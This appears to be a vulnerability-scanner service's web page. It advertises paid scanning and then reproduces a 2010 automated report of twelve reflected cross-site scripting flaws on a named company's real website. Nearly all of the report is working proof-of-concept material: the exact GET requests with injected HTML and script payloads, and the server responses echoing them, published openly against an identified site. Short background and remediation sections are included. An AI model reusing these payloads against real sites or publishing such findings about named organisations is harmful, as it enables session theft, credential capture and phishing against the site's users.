Contractor for Hire: Per Minute, Per Day, Bounty Hunting
Example #1: Automated Vulnerability Crawler: $1/min, max charge is US $10 for 200 URL + 10 Params for
CWE-79, CWE-89 and CWE-113 (XSS, SQL Injection and HTTP Header Injection).
Example #2: Hybrid Risk Analysis: $2/min, max charge is US $30 for 200 URL + 10 Params, Manual Testing of High Value URI/Param targets.
Example #3: Penetration Testing: Individual Case Basis, use Live Chat for a Quote.
Example #4:
Report generated by XSS.CX at Thu Nov 25 14:42:17 CST 2010.
Cross Site Scripting Reports | Hoyt LLC Research
1. Cross-site scripting (reflected)
1.1. http://www.anite.com/managed-it-services-anite-plc.html [Itemid parameter]
1.2. http://www.anite.com/managed-it-services-anite-plc.html [REST URL parameter 1]
1.3. http://www.anite.com/managed-it-services-anite-plc.html [name of an arbitrarily supplied request parameter]
1.4. http://www.anite.com/nemo-wireless-network-measurement-solutions-anite.html [Itemid parameter]
1.5. http://www.anite.com/nemo-wireless-network-measurement-solutions-anite.html [REST URL parameter 1]
1.6. http://www.anite.com/nemo-wireless-network-measurement-solutions-anite.html [name of an arbitrarily supplied request parameter]
1.7. http://www.anite.com/travel-technology-solutions-anite-plc-3.html [Itemid parameter]
1.8. http://www.anite.com/travel-technology-solutions-anite-plc-3.html [REST URL parameter 1]
1.9. http://www.anite.com/travel-technology-solutions-anite-plc-3.html [name of an arbitrarily supplied request parameter]
1.10. http://www.anite.com/wireless-handset-and-network-testing-anite.html [Itemid parameter]
1.11. http://www.anite.com/wireless-handset-and-network-testing-anite.html [REST URL parameter 1]
1.12. http://www.anite.com/wireless-handset-and-network-testing-anite.html [name of an arbitrarily supplied request parameter]
1. Cross-site scripting (reflected)
There are 12 instances of this issue:
Issue background
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:- Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
- User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
1.1. http://www.anite.com/managed-it-services-anite-plc.html [Itemid parameter]
next
Summary
Severity: |
High |
Confidence: |
Firm |
Host: |
http://www.anite.com |
Path: |
/managed-it-services-anite-plc.html |
Issue detail
The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd969"><a>96ae481484f was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /managed-it-services-anite-plc.html?Itemid=208cd969"><a>96ae481484f HTTP/1.1 Host: www.anite.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.0 200 OK Date: Thu, 25 Nov 2010 16:56:00 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.14 Set-Cookie: 87835e346e677cb58ad6bcdf7d06efda=f4l13bvthfc041aaqtif8crth6; path=/ P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Thu, 25 Nov 2010 16:56:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xht ...[SNIP]... <a href="http://www.anite.com/managed-it-services-anite-plc.html?Itemid=208cd969"><a>96ae481484f#up"> ...[SNIP]...
|
1.2. http://www.anite.com/managed-it-services-anite-plc.html [REST URL parameter 1]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://www.anite.com |
Path: |
/managed-it-services-anite-plc.html |
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ffc4f"><script>alert(1)</script>811b8d1171e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ffc4f"><script>alert(1)</script>811b8d1171e HTTP/1.1 Host: www.anite.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.0 404 NOT FOUND Date: Thu, 25 Nov 2010 16:56:14 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.14 Set-Cookie: 87835e346e677cb58ad6bcdf7d06efda=n643m5lm4r5vatitokem9hurb4; path=/ P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Thu, 25 Nov 2010 16:56:14 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xht ...[SNIP]... <a href="http://www.anite.com/ffc4f"><script>alert(1)</script>811b8d1171e#up"> ...[SNIP]...
|
1.3. http://www.anite.com/managed-it-services-anite-plc.html [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Firm |
Host: |
http://www.anite.com |
Path: |
/managed-it-services-anite-plc.html |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc2ff"><a>f1d23421164 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /managed-it-services-anite-plc.html?fc2ff"><a>f1d23421164=1 HTTP/1.1 Host: www.anite.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.0 200 OK Date: Thu, 25 Nov 2010 16:55:51 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.14 Set-Cookie: 87835e346e677cb58ad6bcdf7d06efda=8n2702sdfhb121ue6t0m6qmoj2; path=/ P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Thu, 25 Nov 2010 16:55:51 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xht ...[SNIP]... <a href="http://www.anite.com/managed-it-services-anite-plc.html?fc2ff"><a>f1d23421164=1#up"> ...[SNIP]...
|
1.4. http://www.anite.com/nemo-wireless-network-measurement-solutions-anite.html [Itemid parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Firm |
Host: |
http://www.anite.com |
Path: |
/nemo-wireless-network-measurement-solutions-anite.html |
Issue detail
The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 972c8"><a>698aac813d was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /nemo-wireless-network-measurement-solutions-anite.html?Itemid=59972c8"><a>698aac813d HTTP/1.1 Host: www.anite.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.0 200 OK Date: Thu, 25 Nov 2010 16:55:53 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.14 Set-Cookie: 87835e346e677cb58ad6bcdf7d06efda=5upl4v0r884fdja1mmtbocohb2; path=/ P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Thu, 25 Nov 2010 16:55:53 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xht ...[SNIP]... <a href="http://www.anite.com/nemo-wireless-network-measurement-solutions-anite.html?Itemid=59972c8"><a>698aac813d#up"> ...[SNIP]...
|
1.5. http://www.anite.com/nemo-wireless-network-measurement-solutions-anite.html [REST URL parameter 1]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://www.anite.com |
Path: |
/nemo-wireless-network-measurement-solutions-anite.html |
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25ef1"><script>alert(1)</script>16b81561b79 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /25ef1"><script>alert(1)</script>16b81561b79 HTTP/1.1 Host: www.anite.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.0 404 NOT FOUND Date: Thu, 25 Nov 2010 16:56:09 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.14 Set-Cookie: 87835e346e677cb58ad6bcdf7d06efda=veo2kmopd9ed8ht21suo6ojo84; path=/ P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Thu, 25 Nov 2010 16:56:09 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xht ...[SNIP]... <a href="http://www.anite.com/25ef1"><script>alert(1)</script>16b81561b79#up"> ...[SNIP]...
|
1.6. http://www.anite.com/nemo-wireless-network-measurement-solutions-anite.html [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Firm |
Host: |
http://www.anite.com |
Path: |
/nemo-wireless-network-measurement-solutions-anite.html |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1772"><a>395f1082fe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /nemo-wireless-network-measurement-solutions-anite.html?a1772"><a>395f1082fe=1 HTTP/1.1 Host: www.anite.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.0 200 OK Date: Thu, 25 Nov 2010 16:55:47 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.14 Set-Cookie: 87835e346e677cb58ad6bcdf7d06efda=aq2ae7qs6rrkepkgohsg047jd2; path=/ P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Thu, 25 Nov 2010 16:55:48 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xht ...[SNIP]... <a href="http://www.anite.com/nemo-wireless-network-measurement-solutions-anite.html?a1772"><a>395f1082fe=1#up"> ...[SNIP]...
|
1.7. http://www.anite.com/travel-technology-solutions-anite-plc-3.html [Itemid parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Firm |
Host: |
http://www.anite.com |
Path: |
/travel-technology-solutions-anite-plc-3.html |
Issue detail
The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bbe5f"><a>dbfe664387d was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /travel-technology-solutions-anite-plc-3.html?Itemid=266bbe5f"><a>dbfe664387d HTTP/1.1 Host: www.anite.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.0 200 OK Date: Thu, 25 Nov 2010 16:55:56 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.14 Set-Cookie: 87835e346e677cb58ad6bcdf7d06efda=1p7rd7nr4v0fil9tri0imn98e2; path=/ P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Thu, 25 Nov 2010 16:55:57 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xht ...[SNIP]... <a href="http://www.anite.com/travel-technology-solutions-anite-plc-3.html?Itemid=266bbe5f"><a>dbfe664387d#up"> ...[SNIP]...
|
1.8. http://www.anite.com/travel-technology-solutions-anite-plc-3.html [REST URL parameter 1]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://www.anite.com |
Path: |
/travel-technology-solutions-anite-plc-3.html |
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7744a"><script>alert(1)</script>103718c63e4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /7744a"><script>alert(1)</script>103718c63e4 HTTP/1.1 Host: www.anite.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.0 404 NOT FOUND Date: Thu, 25 Nov 2010 16:56:12 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.14 Set-Cookie: 87835e346e677cb58ad6bcdf7d06efda=5m5ul0b1jmij7brj9ntd1hrtt0; path=/ P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Thu, 25 Nov 2010 16:56:12 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xht ...[SNIP]... <a href="http://www.anite.com/7744a"><script>alert(1)</script>103718c63e4#up"> ...[SNIP]...
|
1.9. http://www.anite.com/travel-technology-solutions-anite-plc-3.html [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Firm |
Host: |
http://www.anite.com |
Path: |
/travel-technology-solutions-anite-plc-3.html |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4dd92"><a>42470075a8c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /travel-technology-solutions-anite-plc-3.html?4dd92"><a>42470075a8c=1 HTTP/1.1 Host: www.anite.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.0 200 OK Date: Thu, 25 Nov 2010 16:55:49 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.14 Set-Cookie: 87835e346e677cb58ad6bcdf7d06efda=ifulpujm6gdn39mro1n0dbv3l0; path=/ P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Thu, 25 Nov 2010 16:55:50 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xht ...[SNIP]... <a href="http://www.anite.com/travel-technology-solutions-anite-plc-3.html?4dd92"><a>42470075a8c=1#up"> ...[SNIP]...
|
1.10. http://www.anite.com/wireless-handset-and-network-testing-anite.html [Itemid parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Firm |
Host: |
http://www.anite.com |
Path: |
/wireless-handset-and-network-testing-anite.html |
Issue detail
The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 825bf"><a>b48ef732111 was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wireless-handset-and-network-testing-anite.html?Itemid=411825bf"><a>b48ef732111 HTTP/1.1 Host: www.anite.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.0 200 OK Date: Thu, 25 Nov 2010 16:55:51 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.14 Set-Cookie: 87835e346e677cb58ad6bcdf7d06efda=ncc5c7k58qrh56qu4ofbkqm620; path=/ P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Thu, 25 Nov 2010 16:55:51 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xht ...[SNIP]... <a href="http://www.anite.com/wireless-handset-and-network-testing-anite.html?Itemid=411825bf"><a>b48ef732111#up"> ...[SNIP]...
|
1.11. http://www.anite.com/wireless-handset-and-network-testing-anite.html [REST URL parameter 1]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://www.anite.com |
Path: |
/wireless-handset-and-network-testing-anite.html |
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89e75"><script>alert(1)</script>89543274812 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /89e75"><script>alert(1)</script>89543274812 HTTP/1.1 Host: www.anite.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.0 404 NOT FOUND Date: Thu, 25 Nov 2010 16:56:08 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.14 Set-Cookie: 87835e346e677cb58ad6bcdf7d06efda=gfrq1qbilb5sj9a9gs3m12efa2; path=/ P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Thu, 25 Nov 2010 16:56:08 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xht ...[SNIP]... <a href="http://www.anite.com/89e75"><script>alert(1)</script>89543274812#up"> ...[SNIP]...
|
1.12. http://www.anite.com/wireless-handset-and-network-testing-anite.html [name of an arbitrarily supplied request parameter]
previous
Summary
Severity: |
High |
Confidence: |
Firm |
Host: |
http://www.anite.com |
Path: |
/wireless-handset-and-network-testing-anite.html |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82558"><a>c9c196c1ab0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wireless-handset-and-network-testing-anite.html?82558"><a>c9c196c1ab0=1 HTTP/1.1 Host: www.anite.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.0 200 OK Date: Thu, 25 Nov 2010 16:55:47 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.14 Set-Cookie: 87835e346e677cb58ad6bcdf7d06efda=jglqictrlu55ukg40mtjdh38f6; path=/ P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Thu, 25 Nov 2010 16:55:47 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xht ...[SNIP]... <a href="http://www.anite.com/wireless-handset-and-network-testing-anite.html?82558"><a>c9c196c1ab0=1#up"> ...[SNIP]...
|
Report generated by XSS.CX at Thu Nov 25 14:42:17 CST 2010.